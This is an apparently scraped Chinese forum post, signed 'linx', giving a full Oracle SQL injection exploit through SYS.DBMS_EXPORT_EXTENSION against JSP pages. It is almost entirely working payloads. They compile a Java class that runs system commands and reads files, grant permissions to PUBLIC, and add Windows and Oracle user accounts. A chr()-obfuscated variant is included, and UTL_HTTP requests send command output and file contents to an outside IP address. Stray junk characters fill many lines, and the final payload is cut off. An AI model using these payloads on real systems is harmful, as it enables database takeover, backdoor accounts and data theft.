以下的演示都是在web上的sql plus执行的,在web注入时 把select SYS.DBMS_EXPORT_EXTENSION.....改成
+ x! s4 ~. S) w! j, P. v6 x9 e7 y5 ]; {
/xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....) 5 N8 @6 Q0 n0 U9 b5 z
的形式即可。(用" 'a'|| "是为了让语句返回true值) & \6 Y2 n1 ?& }9 O2 G: R
语句有点长,可能要用post提交。 & b) w b6 m9 v3 o
以下是各个步骤:
% v' k" r9 [& q ?( j1.创建包
' T1 T2 ?: o. ]0 l3 L通过注入 SYS.DBMS_EXPORT_EXTENSION 函数,在oracle上创建Java包LinxUtil,里面两个函数,runCMD用于执行系统命令,readFile用于读取文件:
" O( S# D$ D1 A/xxx.jsp?id=1 and '1'<>'a'||( ( t6 U8 s) R8 Z8 ~
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT( 1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''$ X0 S. s# s; ?2 o
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
8 k: H7 X6 i8 `. e* L6 qnew InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}3 _6 X3 I6 ], p: K- G
}'''';END;'';END;--','SYS',0,'1',0) from dual ! F* H/ `" K4 O. ?
) , {; [( f( m4 W, V/ ?0 m3 L
------------------------ $ G! w8 R# B _
如果url有长度限制,可以把readFile()函数块去掉,即: i) c- r& _6 ?7 y+ k
/xxx.jsp?id=1 and '1'<>'a'||(
9 m- {0 f6 R @( Oselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
2 m+ W) w' E' h% Ecreate or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
* S m0 U5 b" |' f T* p$ Rnew InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}) ^# G% b0 L5 V# f+ R" `
}'''';END;'';END;--','SYS',0,'1',0) from dual
4 |# j0 X) ]/ h9 r) 6 Q8 q6 A$ o7 [
同时把后面步骤 提到的 对readFile()的处理语句去掉。
" C+ Y8 b; v1 i& g W------------------------------ + }6 m- v/ o6 P( u( A5 ]: I
2.赋Java权限 - @5 r1 ^. V* r1 M4 P' `- o
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual2 |; p; L0 [8 Q- x' r( f
3.创建函数 3 n* I+ V/ D: N: I7 `# u
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
; M/ P; }) W/ V0 lcreate or replace function LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual* o) |3 E/ @8 F9 x' w6 Z1 O+ e7 K
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
9 E( z4 A' o9 [& p- t: L. p. M+ {create or replace function LinxReadFile(filename in varchar2) return varchar2 as language java name ''''''''LinxUtil.readFile(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual
( h+ p4 T0 r8 }1 m& V7 B4 H. a% v4.赋public执行函数的权限 / h$ w& j5 x B2 t3 I+ ^
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual! \+ e* h+ C1 D$ N
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual
/ h* ~' j" d( r' P( w5.测试上面的几步是否成功
! k, X7 M% h. X6 Iand '1'<>'11'||( % o3 i6 e1 d& T* A
select OBJECT_ID from all_objects where object_name ='LINXRUNCMD'
0 N6 j% i7 `8 H% E6 W) . M8 `3 r' r u- C2 o
and '1'<>(
: |& Z) S3 S) Z; U& tselect OBJECT_ID from all_objects where object_name ='LINXREADFILE' 5 T# X4 @6 U$ X3 ~
)
% E& R, a9 P L6.执行命令:
2 j! X8 Y5 }% v% X9 q1 f/xxx.jsp?id=1 and '1'<>( 2 O1 r; |! |4 C F9 z0 z$ A- z
select sys.LinxRunCMD('cmd /c net user linx /add') from dual % _, s7 U7 T; h9 H% N* ?* C
5 L8 |( d* \9 K% s: Q: r+ r2 J
)
0 i d, Z* D2 R. Z' X/xxx.jsp?id=1 and '1'<>( : L, f# f% P* z4 ~5 Q
select sys.LinxReadFile('c:/boot.ini') from dual7 \" J; ]8 ^, h2 u, x9 z$ A6 l
8 @7 H- R' `* v( r" r7 Y5 q)
. F9 j( O" P+ ?1 p- U B
! x v$ A. |% P注意sys.LinxReadFile()返回的是varchar类型,不能用"and 1<>" 代替 "and '1'<>"。 7 i% l; Y4 v5 j$ Q. Y
如果要查看运行结果可以用 union : / j% B9 ~5 W, R, P1 @; f9 N
/xxx.jsp?id=1 union select sys.LinxRunCMD('cmd /c net user linx /add') from dual
3 _2 y9 ^! F' J' V }+ M+ x或者UTL_HTTP.request(: 0 ]5 S" P' a1 R
/xxx.jsp?id=1 and '1'<>(
/ O3 Y+ K7 e, o9 Y- hSELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),'\n','%0A')) FROM dual7 f* _( I: n1 a
) 7 T' k" `! `& K- \1 ~
/xxx.jsp?id=1 and '1'<>(
- Y9 M2 Q' n$ S% E* X" VSELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),'\n','%0A')) FROM dual
$ B+ o$ p2 U& e' D9 })
$ H0 k, C8 s9 F. ]注意:用UTL_HTTP.request时,要用 REPLACE() 把空格、换行符给替换掉,否则会无法提交http request。用utl_encode.base64_encode也可以。, N- D) N- D8 N+ p( e) B5 a. u
--------------------
* D8 [* P" X3 O( P0 i! M6.内部变化 ; {* ?- P! M9 {5 @
通过以下命令可以查看all_objects表达改变:
j: V5 S& y: P2 |" w% s: eselect * from all_objects where object_name like '%LINX%' or object_name like '%Linx%'
: p* \; s# n7 A+ `' ? X7.删除我们创建的函数
6 {# j! b) S, F' {select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''; z% q' ^5 v9 d T) W2 H8 R- L
drop function LinxRunCMD '''';END;'';END;--','SYS',0,'1',0) from dual
6 A6 s' ~/ Q, ^- v====================================================
, ?; s! k. A3 K全文结束。谨以此文赠与我的朋友。 . h( Q( V: C' t$ \
linx f3 L! I, s" q% x4 [. x1 a
124829445 + Q1 u. O) M, O9 J
2008.1.12
; ]" R8 n }; W0 Blinyujian@bjfu.edu.cn . h+ M9 W* H& t) v* ?) _
====================================================================== . @- b9 a! f9 f
测试漏洞的另一方法:
2 ~" y" p' ]! G/ ~9 h! K创建oracle帐号: % [1 b8 C% s# A2 A# j/ i. n9 R
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''2 u0 x3 f0 E: J5 ?( i {
CREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual- R S2 ^& C. z+ \$ G
即: + E, a) D" G) c6 M
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),. I( K5 }# ^: X7 p7 H4 {
chr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual # R% k8 j7 f* D$ T
确定漏洞存在:
1 `7 ?& L# U9 B ^" c1<>( , z1 }8 D5 E, t' _
select user_id from all_users where username='LINXSQL' 5 F1 y, g$ k: h, O
)
: H$ p1 S2 o" K7 K给linxsql连接权限: 0 q1 B% }$ ~8 | I
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''2 M. V4 ?, A; P5 W/ p' R
GRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual ; I) d( l* d) I) C- }& g. f7 s
删除帐号:
! u6 Q' ~& T" m& E3 U mselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''! C; Q- H/ H: b# C4 Y# Y
drop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual ( K7 q; r' I- Z8 v& b$ O7 x( q% V
====================== 3 Z% | G0 _, e3 j9 J. Q
以下方法创建一个可以执行多语句的函数Linx_query(),执行成功的话返回数值"1",但权限是继承的,可能仅仅是public权限,作用似乎不大,真的要用到话可以考虑grant dba to 当前的User:1 ]) F9 U8 w$ t( G6 C' B; R6 [ u
1.jsp?id=1 and '1'<>( 9 }% t2 s$ X/ n* S9 u6 r1 ]4 @: ^% F7 B
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''& D+ ]1 g3 x* j. Y; |# j
create or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1; end; '''';END;'';END;--','SYS',0,'1',0) from dual
& k4 P5 {0 p( C) and ... 1.jsp?id=1 and '1'( select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE- x. h7 r9 h( F# c
)9 u+ `: @( y' P4 }6 I
2 E: M/ c# B; e' w
. s( ]9 t& _9 ?: x5 Z2 F6 f
6 T0 g1 ^# b) S4 y5 D) B" P' _7 i' y |
发表于 2012-12-18 12:21:48
收藏
支持
反对